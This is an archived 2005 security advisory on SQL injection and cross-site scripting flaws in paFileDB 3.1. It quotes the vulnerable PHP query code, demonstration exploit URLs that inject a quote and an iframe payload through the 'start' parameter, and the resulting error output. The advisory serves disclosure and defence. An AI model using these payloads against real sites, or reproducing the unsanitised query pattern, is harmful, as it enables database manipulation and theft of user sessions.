SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   paFileDB Vendors:   PHP Arena
paFileDB Input Validation Errors in 'viewall.php' and 'category.php' Permit SQL Injection and Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1013426
SecurityTracker URL:  http://securitytracker.com/id/1013426
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 14 2005
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 3.1
Description:   sp3x of SecurityReason reported an input validation vulnerability in paFileDB in 'viewall.php' and 'category.php'. A remote user can inject SQL commands and conduct cross-site scripting attacks.

The '/includes/viewall.php' and '/includes/category.php' scripts do not properly validate user-supplied input in the 'start' parameter. A remote user can submit a specially crafted URL to execute SQL commands on the underlying database.

Some demonstration exploit URLs are provided:

http://[target]/[pafiledb_dir]/pafiledb.php?action=viewall&start='&sortby=rating
http://[target]/[pafiledb_dir]/pafiledb.php?action=category&start='&sortby=rating

This same vulnerability can be exploited to conduct cross-site scripting attacks because the error message displays the user-supplied input in the malformed SQL query. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the paFileDB software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploir URLs are provided:

http://[target]/[pafiledb_dir]/pafiledb.php?action=viewall&start="><iframe%20src=http://www.securityreason.com></iframe>&sortby=rating
http://[target]/[pafiledb_dir]/pafiledb.php?action=category&start="><iframe%20src=http://www.securityreason.com></iframe>&sortby=date

Impact:   A remote user can execute SQL commands on the underlying database.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the paFileDB software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.phparena.net/pafiledb.php (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  [SECURITYREASON.COM] SQL injection and XSS in paFileDB




-=[ SecurityReason-2005-SRA#03 ]=-

-=[ SQL injection and XSS in paFileDB ]=-

Author: sp3x
Date: 12 March 2005

Affected software :
===================
paFileDB version : =>3.1

Description :
=============

paFileDB is designed to allow webmasters have a database of files for download on their site. 
To add a download, all you do is upload the file using FTP or whatever method you use, log
into paFileDB's admin center, and fill out a form to add a file. paFileDB lets you edit and
delete the files too. 
No more messing with a bunch of HTML pages for a file database on your site! 
Using speedy MySQL for storing data, and powerful PHP for processing everything, paFileDB is
one of the best and easiest ways to manage files!

SQL injection:
=======================

/includes/viewall.php
/includes/category.php

Code:
-------------------------------------------------------------------------------------------------
if ($sortby == "name") {
        $result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files WHERE file_pin = '0' ORDER BY file_name 

ASC LIMIT $start,20", 0);
}
if ($sortby == "date") {
        $result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files WHERE file_pin = '0' ORDER BY file_time 

DESC LIMIT $start,20", 0);
}
if ($sortby == "downloads") {
        $result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files WHERE file_pin = '0' ORDER BY file_dls 

DESC LIMIT $start,20", 0);
}
if ($sortby == "rating") {
        $result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files WHERE file_pin = '0' ORDER BY 

(file_rating/file_totalvotes - 1) DESC LIMIT $start,20", 0);
}
--------------------------------------------------------------------------------------------------

As we can see the $start variable is vuln for sql injection attack.
But this sql injection for now is not critical , why ? because if we want to inject malicious code to sql sentence 

after "ORDER BY" or after "LIMIT", then in current MySql versions, all we can do, is to fail the sql request. No 

UNION-s etc. When we try to inject sql sentence we get : "Wrong usage of UNION and ORDER BY Error number: 1221" so we 

must wait When Mysql version 4.1 will be widely used then we can have something like this - "ORDER BY desc ASC LIMIT 

(SELECT our_table FROM pafiledb_admin)...".

Examples:
=========

Sql injection:
--------------
http://[target]/[pafiledb_dir]/pafiledb.php?action=viewall&start='&sortby=rating
http://[target]/[pafiledb_dir]/pafiledb.php?action=category&start='&sortby=rating

error message :
---------------
paFileDB was unable to successfully run a MySQL query.
MySQL Returned this error: You have an error in your SQL syntax near '\',20' at line 1 Error number: 1064
The query that caused this error was: SELECT * FROM pafiledb_files WHERE file_pin = '0' ORDER BY 

(file_rating/file_totalvotes - 1) DESC LIMIT \',20

Also in this error message we can see the [prefix] pafiledb tables that should be hidden :) 
And we can insert XSS code in error message for example :

Cros Site Scripting (XSS):
--------------------------

http://[target]/[pafiledb_dir]/pafiledb.php?action=viewall&start="><iframe%20src=http://www.securityreason.com></iframe

>&sortby=rating
http://[target]/[pafiledb_dir]/pafiledb.php?action=category&start="><iframe%20src=http://www.securityreason.com></ifram

e>&sortby=date

error message :
---------------
paFileDB was unable to successfully run a MySQL query.
MySQL Returned this error: You have an error in your SQL syntax near '[Our XSS]',20' at line 1 Error number: 1064
The query that caused this error was: SELECT * FROM pafiledb_files WHERE file_pin = '0' ORDER BY 

(file_rating/file_totalvotes - 1) DESC LIMIT [Our XSS]',20

How to fix :
============

Download the new version of the script or update.

Vendor :
========

No respond


Greetz :
========

Special greetz : cXIb8O3 , pkw :]

Contact :
=========

sp3x[at]securityreason[dot].com
www.securityreason.com

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC